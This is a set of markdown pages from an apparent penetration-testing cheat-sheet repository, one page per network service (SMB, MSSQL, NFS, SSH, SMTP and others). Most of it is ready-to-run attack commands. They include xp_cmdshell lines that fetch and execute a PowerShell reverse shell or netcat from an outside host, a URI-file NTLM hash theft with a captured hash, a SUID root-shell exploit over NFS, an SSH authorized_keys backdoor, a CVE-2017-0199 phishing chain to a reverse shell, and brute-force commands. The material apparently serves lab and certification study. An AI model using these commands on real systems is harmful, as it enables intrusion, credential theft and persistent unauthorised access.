51 | use auxiliary/scanner/pop3/pop3_login 52 | ``` 53 | 54 | ## Example 55 | 56 | ```bash 57 | root@kali:~# telnet $ip 110 58 | +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready 59 | USER billydean 60 | +OK 61 | PASS password 62 | +OK Welcome billydean 63 | 64 | list 65 | 66 | +OK 2 1807 67 | 1 786 68 | 2 1021 69 | 70 | retr 1 71 | 72 | +OK Message follows 73 | From: jamesbrown@motown.com 74 | Dear Billy Dean, 75 | 76 | Here is your login for remote desktop ... try not to forget it this time! 77 | username: billydean 78 | password: PA$$W0RD!Z 79 | ``` 80 | -------------------------------------------------------------------------------- /pentesting-network/111-rpcbind.md: -------------------------------------------------------------------------------- 1 | # 111 (Rpcbind) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Check for passwords in files on mountable drives 8 | 9 | ### rpcbind 10 | 11 | ```bash 12 | rpcbind -p 192.168.1.101 13 | ``` 14 | 15 | ### rpcinfo 16 | 17 | ```bash 18 | rpcinfo irked.htb 19 | nmap -sSUC -p111 192.168.10.1 20 | ``` 21 | 22 | ```bash 23 | #check general rpc info 24 | rpcinfo 25 | 26 | #Check what shares you can mount 27 | showmount -e 28 | 29 | #mounting the share 30 | #make the directory 31 | mkdir /mnt/share 32 | #mount the share 33 | mount -t nfs :/share /mnt/share -nolock 34 | ``` 35 | 36 | ### nmap 37 | 38 | ```bash 39 | nmap -v -p 111 --script=nfs* 40 | 41 | rpcclient -U "" $target 42 | rpcclient $> enumdomusers 43 | rpcclient $> queryuser 0xrid_ID 44 | ``` 45 | -------------------------------------------------------------------------------- /pentesting-network/11211-memcached.md: -------------------------------------------------------------------------------- 1 | # 11211 (Memcached) 2 | 3 | -------------------------------------------------------------------------------- /pentesting-network/135-rpc.md: -------------------------------------------------------------------------------- 1 | # 135 (RPC) 2 | 3 | ## Enumeration 4 | 5 | #### 6 | -------------------------------------------------------------------------------- /pentesting-network/137-138-139-netbios.md: -------------------------------------------------------------------------------- 1 | # 137,138,139 (NetBIOS) 2 | 3 | ## Enumerations 4 | 5 | ### Commands & Tools 6 | 7 | #### nbtstat 8 | 9 | ```bash 10 | nbtstat -n 11 | nbtstat -A 12 | ``` 13 | 14 | #### nbtscan 15 | 16 | ```bash 17 | nbtscan -v 18 | ``` 19 | 20 | #### net 21 | 22 | ```bash 23 | net view # List domains, computers, and resources shared 24 | net use K: \\\C # Connect to a computer from a shared resource 25 | ``` 26 | 27 | #### nmap 28 | 29 | ```bash 30 | sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n 31 | ``` 32 | -------------------------------------------------------------------------------- /pentesting-network/139-445-smb.md: -------------------------------------------------------------------------------- 1 | # 139,445 (SMB) 2 | 3 | ## Enumeration 4 | 5 | ### smbmap 6 | 7 | ```bash 8 | smbmap -H 9 | smbmap -H -u anonymous 10 | smbmap -H -u '' -p '' 11 | smbmap -H -u 'guest' -p '' 12 | smbmap -R -H # List out directories and their contents 13 | # Look for things like Groups.xml for AD 14 | smbmap -R -H -A Groups.xml -q # Attempt to download file 15 | # Locate cpasword= in Groups.xml and decrypt it 16 | gpp-decrypt 17 | ``` 18 | 19 | ### smbclient 20 | 21 | ```bash 22 | smbclient -L // # List out available shares 23 | smbclient -L /// -U 24 | smbclient /// # Connect to an available share 25 | 26 | # Forcing Protol NT1 27 | smbclient -L /// --option='client min protocol=NT1' 28 | smbclient /// --option='client min protocol=NT1' 29 | ``` 30 | 31 | #### Commands 32 | 33 | ```bash 34 | dir /a 35 | smb: \> mask "*" 36 | smb: \> recurse ON 37 | smb: \> prompt OFF 38 | smb: \> mget * 39 | ``` 40 | 41 | ### crackmapexec 42 | 43 | ```bash 44 | crackmapexec smb 45 | crackmapexec smb 'guest' -p '' 46 | crackmapexec smb --shares 47 | crackmapexec smb --shares -u '' -p '' 48 | crackmapexec smb --shares -u -p 49 | crackmapexec smb --pass-pol 50 | crackmapexec smb --pass-pol -u '' -p '' # Null authentication attempt 51 | crackmapexec smb --users 52 | crackmapexec smb -u 'a' -p '' --rid-brute # Enum users by bruteforcing RID 53 | crackmapexec smb -u -H # Look for Pwn3d! 54 | crackmapexec smb -u -p # SMB authentication/bruteforce 55 | 56 | crackmapexec winrm --shares -u -p # Tell us if we can get on the machine 57 | # Look for Pwn3d! 58 | evil-winrm -i -u -p 59 | ``` 60 | 61 | ### rpcclient 62 | 63 | ```bash 64 | rpcclient 65 | rpcclient -U '' # Check for anonymous login 66 | rpcclient -U '' -N # Saying with no password 67 | > # Check for options 68 | > enumdomusers # List out usernames 69 | > queryuser 70 | > queryuser 71 | > queryusergroups 72 | > querydispinfo 73 | > enumdomgroups 74 | > querygroup 75 | > querygroupmem 76 | > lookupnames 77 | > lookupsids 78 | ``` 79 | 80 | After running `enumdomusers` and getting a list of users, pull out just the usernames by: 81 | 82 | ```bash 83 | cat users.txt | awk -F\[ '{print $2}' | awk -F\] '{print $1}' > newfile.txt 84 | ``` 85 | 86 | #### SIDs 87 | 88 | Brute force enumerating SIDs to identify other users 89 | 90 | ```bash 91 | # Bash one liner 92 | for i in {1000..1050}; do rpcclient -U '%' -c "lookupsids S-1-5-21-4254423774-1266059056-3197185112-$i" | grep -v unknown; done 93 | # Python script (Impacket) 94 | lookupsid.py :@ 95 | ``` 96 | 97 | ### nbtscan 98 | 99 | ```bash 100 | nbtscan 101 | ``` 102 | 103 | ### enum4linux 104 | 105 | ```bash 106 | enum4linux 107 | ``` 108 | 109 | ### samrdump 110 | 111 | ```bash 112 | python3 /usr/share/doc/python3-impacket/examples/samrdump.py 113 | ``` 114 | 115 | ### nmap 116 | 117 | ```bash 118 | # /usr/share/nmap/scripts/smb* 119 | nmap -p445 --script=smb-system-info 120 | nmap -p445 --script=smb-enum* 121 | nmap -p445 --script=smb-vuln* 122 | ``` 123 | 124 | ### Metasploit 125 | 126 | ```bash 127 | search smb 128 | ``` 129 | 130 | ## Brute Force 131 | 132 | ```bash 133 | nmap --script smb-brute -p 445 134 | ridenum.py 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce eachusernam 135 | hydra -l Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt smb -V -f 136 | hydra -L usernames.txt -P passwords.txt smb -V -f 137 | ``` 138 | 139 | ## Exploitation Check 140 | 141 | * [ ] Enumerate and download any interesting files ideally looking for credentials or other information relating to other services. 142 | * [ ] Can you login via SMB and put files on the system? 143 | * [ ] If so, is there a web interface where you can access the files? 144 | * [ ] If so, then you may be able to upload a reverse shell. 145 | * [ ] If so, can you use Metasploit to create symbolic link to the root filesystem? 146 | 147 | ## Exploitation 148 | 149 | ### Metasploit 150 | 151 | ```bash 152 | use auxiliary/admin/smb/samba_symlink_traversal 153 | set rhost 154 | set smbshare 155 | exploit 156 | ``` 157 | 158 | Then back in `smbclient` we can `cd` into the `rootfs` that was created. 159 | 160 | ### SMB Password Change 161 | 162 | ```bash 163 | # Attempt to change a users password through SMB 164 | smbpasswd -U -r 165 | # Then can use crackmapexec to test login 166 | cme smb -u -p 167 | cme winrm -u -p 168 | ``` 169 | 170 | ### SMB Drive Mapping 171 | 172 | ```bash 173 | sudo mount -t cifs -o 'user=,password=' //IP/Share /mnt/dir 174 | # Go into /mnt/dir to look for interesting files 175 | ``` 176 | 177 | ### URI File Attack 178 | 179 | If the target is a Windows host and the SMB Share can be written to, we can use the SMB share access to upload a file that the target system will interpret as a Windows shortcut. In this file, we can specify an icon that points to our Kali host. This should allows us to capture the user's NTLM hash when it is accessed. 180 | 181 | Create a file named @hax.url with the following contents 182 | 183 | {% code title="@hax.url" %} 184 | ```bash 185 | [InternetShortcut] 186 | URL=anything 187 | WorkingDirectory=anything 188 | IconFile=\\\%USERNAME%.icon 189 | IconIndex=1 190 | ``` 191 | {% endcode %} 192 | 193 | Start responder to list for the request: 194 | 195 | ```bash 196 | sudo responder -I tap0 -v 197 | ``` 198 | 199 | Upload the file to the SMB share: 200 | 201 | ```bash 202 | kali@kali:~/Documents/offsec/oscp/proving_grounds/Vault$ smbclient //192.168.71.172/DocumentsShare 203 | Password for [WORKGROUP\kali]: 204 | Try "help" to get a list of possible commands. 205 | smb: \> put @hax.url 206 | putting file @hax.url as \@hax.url (0.4 kb/s) (average 0.4 kb/s) 207 | ``` 208 | 209 | Responder Output: 210 | 211 | {% code overflow="wrap" %} 212 | ```bash 213 | [SMB] NTLMv2-SSP Client : 192.168.71.172 214 | [SMB] NTLMv2-SSP Username : VAULT\anirudh 215 | [SMB] NTLMv2-SSP Hash : anirudh::VAULT:a07bde1e074e8ce7:7E005501CA1DA9CF07F1685B766EDFF3:010100000000000000190681B8C7D801B6D4A008DAA2A3E00000000002000800450038004800570001001E00570049004E002D00480053003200380043005100560038004C005900440004003400570049004E002D00480053003200380043005100560038004C00590044002E0045003800480057002E004C004F00430041004C000300140045003800480057002E004C004F00430041004C000500140045003800480057002E004C004F00430041004C000700080000190681B8C7D801060004000200000008003000300000000000000001000000002000001B898DAC5A5D0D98431AE6A160F57301D980DD48CBD559755DCD4AF5BE07242D0A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E00340039002E00370031000000000000000000 216 | ``` 217 | {% endcode %} 218 | 219 | 220 | 221 | -------------------------------------------------------------------------------- /pentesting-network/1433-mssql.md: -------------------------------------------------------------------------------- 1 | # 1433 (MSSQL) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Try default credentials "sa:password" 8 | * [ ] Brute force creds 9 | * [ ] Check database content for new passwords 10 | * [ ] Check version for exploits 11 | * [ ] RCE 12 | * [ ] through xp\_cmdshell functionality 13 | * [ ] through injecting payload in output file, placing it in webroot and triggering it through webapp 14 | 15 | ### Connection 16 | 17 | #### sqsh 18 | 19 | ```bash 20 | sqsh -S -U sa 21 | sqsh -S -U sa -P password 22 | sqsh -S :27900 -U sa -P password 23 | ``` 24 | 25 | #### mssqlclient.py 26 | 27 | ```bash 28 | mssqlclient.py -windows-auth /:@ 29 | mssqlclient.py :@ 30 | 31 | # Once logged in you can run queries: 32 | SQL> select @@ version; 33 | 34 | # Steal NTLM hash 35 | sudo smbserver.py -smb2support liodeus . 36 | SQL> exec master..xp_dirtree '\\\liodeus\' # Steal the NTLM hash, crack it with john or hashcat 37 | 38 | # Try to enable code execution 39 | SQL> enable_xp_cmdshell 40 | 41 | # Execute code 42 | SQL> xp_cmdshell whoami /all 43 | SQL> xp_cmdshell certutil.exe -urlcache -split -f http:///nc.exe 44 | ``` 45 | 46 | ### nmap 47 | 48 | ```bash 49 | nmap -p 1433 --script='banner,(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)' -o 1433_nmap_mssql 50 | # Credential Brute Force 51 | nmap -p 1433 --script ms-sql-brute --script-args passdb=/usr/share/seclists/Passwords/darkweb2017-top1000.txt 52 | 53 | nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 54 | ``` 55 | 56 | ### xp\_cmdshell 57 | 58 | #### Enable 59 | 60 | ```bash 61 | exec sp_configure 'show advanced options', 1 62 | go 63 | reconfigure 64 | go 65 | exec sp_configure 'xp_cmdshell', 1 66 | go 67 | reconfigure 68 | go 69 | ``` 70 | 71 | #### Commands 72 | 73 | ```bash 74 | # Manaul enumeration 75 | xp_cmdshell 'whoami /all'; 76 | xp_cmdshell 'systeminfo'; 77 | xp_cmdshell 'net user'; # Potential for brute force or password re-use 78 | xp_cmdshell 'reg query HKLM /f pass /t REG_SZ /s'; # Search registry for pass 79 | xp_cmdshell 'findstr /si password *.txt *.ini *.config *xml' # Check for plaintext passwords 80 | # Run other PrivEsc commands for enumeration 81 | 82 | # Download files for reverse shell 83 | xp_cmdshell "powershell -c iex(new-object net.webclient).downloadstring('http://192.168.119.165:9090/Invoke-PowerShellTcp.ps1')";-- 84 | xp_cmdshell "certutil -urlcache -f 'http://192.168.119.165:9090/nc.exe' nc.exe" 85 | 86 | # Create user and pass then add them to Admin group (Need enough permissions) 87 | xp_cmdshell 'net user byte bytepass /add' 88 | go 89 | xp_cmdshell 'net localgroup Administrators byte /add' 90 | go 91 | xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' 92 | go 93 | ``` 94 | 95 | ### Metasploit 96 | 97 | ```bash 98 | use auxiliary/scanner/mssql/mssql_ping 99 | ``` 100 | 101 | ## Brute Force 102 | 103 | ### Metasploit 104 | 105 | ```bash 106 | scanner/mssql/mssql_login 107 | ``` 108 | 109 | ### Hydra 110 | 111 | ```bash 112 | hydra -l sa -P password.txt -V mssql 113 | hydra -L -P mssql -vV -I -u 114 | ``` 115 | 116 | ### Cheat sheet 117 | 118 | ```bash 119 | https://www.asafety.fr/mssql-injection-cheat-sheet/ 120 | ``` 121 | -------------------------------------------------------------------------------- /pentesting-network/161-snmp.md: -------------------------------------------------------------------------------- 1 | # 161 (SNMP) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Try the default community strings 'public' and 'private' 8 | * [ ] Enumerate version of OS, users, and processes 9 | 10 | ### Community Strings 11 | 12 | | | | 13 | | ---------------------- | ---------------- | 14 | | 1.3.6.1.2.1.25.1.6.0 | System Processes | 15 | | 1.3.6.1.2.1.25.4.2.1.2 | Running Programs | 16 | | 1.3.6.1.2.1.25.4.2.1.4 | Process Path | 17 | | 1.3.6.1.2.1.25.2.3.1.4 | Storage Units | 18 | | 1.3.6.1.2.1.25.6.3.1.2 | Software Name | 19 | | 1.3.6.1.4.1.77.1.2.25 | User Accounts | 20 | | 1.3.6.1.2.1.6.13.1.3 | TCP Local Ports | 21 | 22 | ### Commands 23 | 24 | #### nmap 25 | 26 | ```bash 27 | nmap -sU -p161 --script "snmp-*" 28 | ``` 29 | 30 | ### Brute Force Community Strings 31 | 32 | ```bash 33 | # try 100+ community strings 34 | onesixtyone -c /home/liodeus/wordlist/SecLists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt 35 | onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 36 | # only try "public" and "private" 37 | onesixtyone -i targets.list 38 | ``` 39 | 40 | #### snmpwalk 41 | 42 | ```bash 43 | snmpwalk -c public -v1 192.168.1.101 #community string and which version 44 | # enumerate windows users 45 | snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 46 | # enumerates running processes 47 | snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 48 | ``` 49 | 50 | ```bash 51 | snmpwalk -v 2c -c public 52 | snmpwalk -v 2c -c public hrSWInstalledName 53 | snmpwalk -v 2c -c public hrMemorySize 54 | snmpwalk -v 2c -c public sysContact # Get the sysContatact variable i.e. nikos 55 | snmpset -v 2c -c public sysContact.0 s els # Change sysContact variable to els 56 | 57 | ``` 58 | 59 | #### snmpbulkwalk 60 | 61 | ```bash 62 | snmpbulkwalk -c -v 63 | ``` 64 | 65 | #### snmp-check 66 | 67 | ```bash 68 | snmp-check 69 | snmp-check -t -c public 70 | ``` 71 | 72 | ### Enumerate Info with Known Community String 73 | 74 | ```bash 75 | snmpwalk -c public -v1 192.168.1.101 #community string and which version 76 | # enumerate windows users 77 | snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 78 | # enumerates running processes 79 | snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 80 | ``` 81 | 82 | ### Modifying SNMP Values 83 | 84 | ```bash 85 | http://net-snmp.sourceforge.net/tutorial/tutorial-5/commands/snmpset.html 86 | ``` 87 | -------------------------------------------------------------------------------- /pentesting-network/2049-nfs.md: -------------------------------------------------------------------------------- 1 | # 2049 (NFS) 2 | 3 | ## Enumeration 4 | 5 | ### nmap Scripts 6 | 7 | ```bash 8 | nmap -p 2049 --script=nfs* 9 | nfs-ls # List NFS exports and check permissions 10 | nfs-showmount # Like showmount -e 11 | nfs-statfs # Disk statistics and info from NFS share 12 | ``` 13 | 14 | ### Metasploit 15 | 16 | Scan NFS mounts and list permissions. 17 | 18 | ```bash 19 | scanner/nfs/nfsmount 20 | ``` 21 | 22 | ### Check Shares 23 | 24 | Check Available Folders 25 | 26 | ```bash 27 | showmount -e 28 | cat /etc/exports # List exported shares 29 | ``` 30 | 31 | ## Mounting 32 | 33 | ### Create Mount 34 | 35 | ```bash 36 | # Syntax 37 | mount -t nfs [-o vers=2] : -o nolock 38 | # Example 39 | mkdir /mnt/myroot 40 | mount -t nfs [-o vers=2] 10.12.0.150:/backup /mnt/myroot -o nolock 41 | # Unmount the mount 42 | umount /mnt/myroot/ 43 | ``` 44 | 45 | #### Using SSH 46 | 47 | ```bash 48 | ssh-keygen # Generate Key Pair 49 | mkdir /mnt/myroot 50 | mount -t nfs :/ /mnt/myroot 51 | cat .ssh/id_rsa.pub >> /mnt/myroot/root/.ssh/authorized_keys 52 | umount /mnt/myroot/ 53 | ``` 54 | 55 | ### Example Exploit 56 | 57 | #### From Attacker as root user 58 | 59 | ```bash 60 | mkdir 61 | mount -v -t nfs : 62 | cd 63 | echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0;}' > pwn.c 64 | gcc pwn.c -o pwn 65 | chmod +s pwn 66 | ``` 67 | 68 | #### From Target as Victim 69 | 70 | ```bash 71 | cd 72 | ./pwn # Root shell 73 | ``` 74 | -------------------------------------------------------------------------------- /pentesting-network/21-ftp.md: -------------------------------------------------------------------------------- 1 | # 21 (FTP) 2 | 3 | ## Enumeration 4 | 5 | ### Banner Grabbing 6 | 7 | ```bash 8 | nc 21 # Grab headers 9 | telnet -vn 21 10 | openssl s_client -connect crossfit.htb:21 -starttls ftp #Get certificate if any 11 | ``` 12 | 13 | ### Connections 14 | 15 | #### Anonymous Login 16 | 17 | * `anonymous:anonymous` 18 | * `anonymous:` 19 | * `guest:` 20 | * `ftp:ftp` 21 | * `admin:admin` 22 | 23 | ```bash 24 | ftp 25 | ftp -p # Passive mode login 26 | >ls -a # List all files (even hidden) (yes, they could be hidden) 27 | >dir /a 28 | >passive # Set the mode to passive 29 | >binary # Set transmission to binary instead of ascii 30 | >ascii # Set transmission to ascii instead of binary 31 | >bye # exit 32 | ``` 33 | 34 | #### Downloading 35 | 36 | ```bash 37 | PASSIVE 38 | BINARY 39 | get 40 | mget * # Download all files 41 | wget -m ftp://anonymous:anonymous@10.10.10.98 # Donwload all files 42 | wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Download all files 43 | ``` 44 | 45 | #### Uploading 46 | 47 | ```bash 48 | PASSIVE 49 | BINARY 50 | put 51 | ``` 52 | 53 | ### nmap Scripts 54 | 55 | ```bash 56 | nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 57 | nmap --script ftp-* -p 21 58 | ``` 59 | 60 | ### Checks 61 | 62 | * [ ] Check for anonymous access 63 | * [ ] Check if you can upload a file to trigger a webshell through webapp 64 | * [ ] Check if you can download backup files to extract included passwords 65 | * [ ] Check the version of FTP for exploits 66 | 67 | ## Brute Forcing 68 | 69 | ```bash 70 | hydra -V -f -L -P ftp:// -u -vV 71 | hydra -l root -P passwords.txt [-t 32] ftp 72 | ``` 73 | -------------------------------------------------------------------------------- /pentesting-network/22-ssh.md: -------------------------------------------------------------------------------- 1 | # 22 (SSH) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Try easy username-password combinations 8 | * [ ] Check for username enumeration vulnerabilities 9 | * [ ] Check version for vulnerabilities 10 | * [ ] Attempt brute forcing 11 | * [ ] Check for Port Knocking 12 | 13 | ### Banner Grabbing 14 | 15 | ```bash 16 | nc 22 17 | nc -vn 22 18 | ``` 19 | 20 | ### Connections 21 | 22 | #### SSH 23 | 24 | ```bash 25 | ssh @ 26 | ssh @ -i id_rsa # Login via private key. chmod 600 27 | ``` 28 | 29 | #### SCP 30 | 31 | ```bash 32 | scp @:/path/to/copy 33 | ``` 34 | 35 | #### SFTP 36 | 37 | ```bash 38 | sftp 39 | ``` 40 | 41 | ### nmap Scripts 42 | 43 | ```bash 44 | nmap -p 22000 -sV -Pn -T4 --script=ssh* 45 | ``` 46 | 47 | ### Restricted Shell Breakout 48 | 49 | ```bash 50 | ssh joe@funbox -i joe_id_rsa -t "bash --noprofile" 51 | ssh seppuku@192.168.53.90 -t "bash --noprofile" 52 | ``` 53 | 54 | ### Account Login Error 55 | 56 | ```bash 57 | # When getting a specific error where only SFTP works, try... 58 | ssh -v @ id 59 | ssh -v @ /bin/bash 60 | ``` 61 | 62 | ### Port knocking 63 | 64 | ```bash 65 | # If nmap comes back showing port 22 as filtered... 66 | # We need to find the /etc/knockd.conf (thorough LFI or FTP or something else) 67 | # Inside there is a sequence 68 | knock IP SEQUENCE1 SEQUENCE2 SEQUENCE3 69 | # Check nmap again 70 | ``` 71 | 72 | ### Key Generation 73 | 74 | ```bash 75 | # Attack machine 76 | ssh-keygen 77 | chmod 600 78 | cat .pub 79 | # Target 80 | echp .pub >> /.ssh/authorized_keys 81 | ``` 82 | 83 | ## Backdoor 84 | 85 | ```bash 86 | # Attacker 87 | ssh-keygen -f 88 | chmod 600 89 | cat .pub -> copy 90 | 91 | # Victim 92 | echo .pub >> /.ssh/authorized_keys 93 | 94 | # Connect 95 | ssh -i @ 96 | ``` 97 | 98 | ## Brute Force 99 | 100 | ```bash 101 | hydra -v -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 ssh 102 | hydra -l -P passwords.txt -T 20 ssh 103 | hydra -V -f -L -P ssh:// -u -vV 104 | ``` 105 | -------------------------------------------------------------------------------- /pentesting-network/23-telnet.md: -------------------------------------------------------------------------------- 1 | # 23 (Telnet) 2 | 3 | ## Enumeration 4 | 5 | ### Banner Grabbing 6 | 7 | ```bash 8 | nc -vn 23 9 | ``` 10 | 11 | ### nmap Scripts 12 | 13 | ```bash 14 | nmap -n -sV -Pn --script "*telnet* and safe" -p 23 15 | ``` 16 | 17 | ## Brute Force 18 | 19 | ```bash 20 | hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt telnet 21 | hydra -l root -P passwords.txt [-t 32] telnet 22 | ``` 23 | -------------------------------------------------------------------------------- /pentesting-network/25-smtp.md: -------------------------------------------------------------------------------- 1 | # 25 (SMTP) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Check for user enumeration 8 | * [ ] Check version for exploits 9 | 10 | ### Scripts 11 | 12 | #### nmap 13 | 14 | ```bash 15 | nmap -p25 --script smtp-commands 16 | nmap --script smtp-enum-users 17 | nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 18 | ``` 19 | 20 | ### Manual 21 | 22 | ```bash 23 | nc -nvv 25 24 | VRFY root 25 | ``` 26 | 27 | ```bash 28 | telnet 25 29 | HELO anydomain.com 30 | MAIL FROM: BruceWayne@WayneCorp.com # Select email address to send from 31 | 250 OK 32 | RCPT TO: # Specify email address to send to 33 | 250 OK # Verifies the user exists 34 | RCPT TO: 35 | 550 Unknown User # Verifies user does not exist 36 | RCPT TO: 37 | 250 OK # Cannot actually verify as its a different domain 38 | 39 | ``` 40 | 41 | Look into sending a malicious document to have the recipient of the email open it and hopefully gain a reverse shell or have the malicious code executed. 42 | 43 | #### Example 44 | 45 | CVE-2017-0199 RTF file exploit using the Reel machine on Hack The Box. 46 | 47 | 
# Generate malicious RTF file
 48 | python cve-2017-0199_toolkit.py -M gen -w test.rtf -u http://attacker/test.hta -t RTF -x 0
 49 | # Generate malicous HTA file using examples from Out-HTA.ps1
 50 | cd /opt/nishang/Client
 51 | pwsh  # Start up PowerShell on Kali
 52 | .\Out-HTA.ps1
 53 | Out-HTA -PayloadURL http://attacker/test.ps1  # Create new ps1 script file
 54 | 
 55 | mv winDef_webInstall.hta /path/to/www
 56 | cp ../CVE-2017-0199/test.rtf /peth/to/www
 57 | cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1
 58 | mv /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 test.ps1  # Move Invoke-PowerShellTcp -Reverse to the bottom of the script
 59 | python3 -m http.server 80
 60 | nc -lvnp 9001
 61 | 
 62 | sendemail -f test@megabank.com -t nico@megabank.com -u RTF -m "Please conver this" -a test.rtf -s 10.10.10.77
 63 | # Wait for reverse shell
 64 |
65 | 66 | ### Commands 67 | 68 | ```bash 69 | HELO - 70 | EHLO - Extended SMTP. 71 | STARTTLS - SMTP communicted over unencrypted protocol. By starting TLS-session we encrypt the traffic. 72 | RCPT - Address of the recipient. 73 | DATA - Starts the transfer of the message contents. 74 | RSET - Used to abort the current email transaction. 75 | MAIL - Specifies the email address of the sender. 76 | QUIT - Closes the connection. 77 | HELP - Asks for the help screen. 78 | AUTH - Used to authenticate the client to the server. 79 | VRFY - Asks the server to verify is the email user's mailbox exists. 80 | ``` 81 | 82 | ### **smtp-user-enum** 83 | 84 | ```bash 85 | smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 86 | ``` 87 | 88 | ```bash 89 | Mode ..................... VRFY 90 | Worker Processes ......... 5 91 | Usernames file ........... /root/sectools/SecLists/Usernames/Names/names.txt 92 | Target count ............. 1 93 | Username count ........... 8607 94 | Target TCP port .......... 25 95 | Query timeout ............ 5 secs 96 | Target domain ............ 97 | 98 | ######## Scan started at Sun Jun 19 11:04:59 2016 ######### 99 | 192.168.1.103: Bin exists 100 | 192.168.1.103: Irc exists 101 | 192.168.1.103: Mail exists 102 | 192.168.1.103: Man exists 103 | 192.168.1.103: Sys exists 104 | ######## Scan completed at Sun Jun 19 11:06:51 2016 ######### 105 | 5 results. 106 | 107 | 8607 queries in 112 seconds (76.8 queries / sec) 108 | ``` 109 | 110 | ### Metasploit 111 | 112 | ```bash 113 | msf > use auxiliary/scanner/smtp/smtp_enum 114 | msf auxiliary(smtp_enum) > show options 115 | 116 | Module options (auxiliary/scanner/smtp/smtp_enum): 117 | 118 | Name Current Setting Required Description 119 | ---- --------------- -------- ----------- 120 | RHOSTS yes The target address range or CIDR identifier 121 | RPORT 25 yes The target port 122 | THREADS 1 yes The number of concurrent threads 123 | UNIXONLY true yes Skip Microsoft bannered servers when testing unix users 124 | USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt yes The file that contains a list of probable users accounts. 125 | ``` 126 | -------------------------------------------------------------------------------- /pentesting-network/27017-27018-27019-mongodb.md: -------------------------------------------------------------------------------- 1 | # 27017, 27018, 27019 (MongoDB) 2 | 3 | ## Login 4 | 5 | By default mongo does not require password.\ 6 | **Admin** is a common mongo database. 7 | 8 | ```bash 9 | mongo 10 | mongo : 11 | mongo :/ 12 | mongo -u -p '' 13 | ``` 14 | 15 | The nmap script: _**mongodb-brute**_ will check if creds are needed. 16 | 17 | ```bash 18 | nmap -n -sV --script mongodb-brute -p 27017 19 | ``` 20 | 21 | **Some MongoDB commands:** 22 | 23 | 
help
24 | show dbs
25 | use <db>
26 | show collections
27 | db.<collection>.find()  // Dump the collection
28 | db.<collection>.count()  // Number of records of the collection
29 | db.current.find({"username":"admin"})  // Find in current db the username admin
30 |
31 | 32 | ```mongodb 33 | use // Create and switch to new DB 34 | db.users.insertOne({name: 'jeremy'}) // Insert some data into the DB 35 | db.users.insertOne({name: 'jessamy', country: 'scotland'}) 36 | db.users.find() 37 | db.users.find().limit(1) // View the first record 38 | db.users.find({country: 'scotland'}) // Find records where the country as scotland 39 | db.users.find({country: {"$ne": 'scotland'}}) // Find records where country is not scotland 40 | 41 | ``` 42 | -------------------------------------------------------------------------------- /pentesting-network/3128-squid.md: -------------------------------------------------------------------------------- 1 | # 3128 (Squid) 2 | 3 | ## Enumeration 4 | 5 | #### curl 6 | 7 | ```bash 8 | curl --proxy http://192.168.76.189:3128 http://192.168.76.189 9 | # After finding other open ports using spose: 10 | curl --proxy http://192.168.76.189:3128 http://192.168.76.189:3306 11 | curl --proxy http://192.168.76.189:3128 http://192.168.76.189:8080 12 | 13 | ``` 14 | 15 | #### spose 16 | 17 | [https://github.com/aancw/spose](https://github.com/aancw/spose) 18 | 19 | ```bash 20 | python3 spose.py --proxy http://192.168.76.189:3128 --target 192.168.76.189 21 | Using proxy address http://192.168.76.189:3128 22 | 192.168.76.189 3306 seems OPEN 23 | 192.168.76.189 8080 seems OPEN 24 | ``` 25 | 26 | #### nmap 27 | 28 | You can use `nmap` to try to do additional scanning with `proxychains` by updating the proxychains.conf file using the following at the bottom of the file: 29 | 30 | `socks5 192.168.76.189 3128` or `http 192.168.76.189 3129` 31 | 32 | ```bash 33 | proxychains sudo nmap -sT -n -p3306,8080 192.168.76.189 -Pn 34 | ``` 35 | 36 | #### Webpage 37 | 38 | If a webpage is found, you can update the proxy settings in your browser or FoxyProxy to be configured with the proxy URL and port and then navigate to the page: [http://192.168.76.189:3128](http://192.168.76.189:3128) 39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /pentesting-network/3306-mysql.md: -------------------------------------------------------------------------------- 1 | # 3306 (MySQL) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Try default credentials "root":"" 8 | * [ ] Brute force credentials 9 | * [ ] Check database content for new passwords 10 | * [ ] Check version for exploits 11 | 12 | ### Connection 13 | 14 | #### Local 15 | 16 | ```bash 17 | 18 | 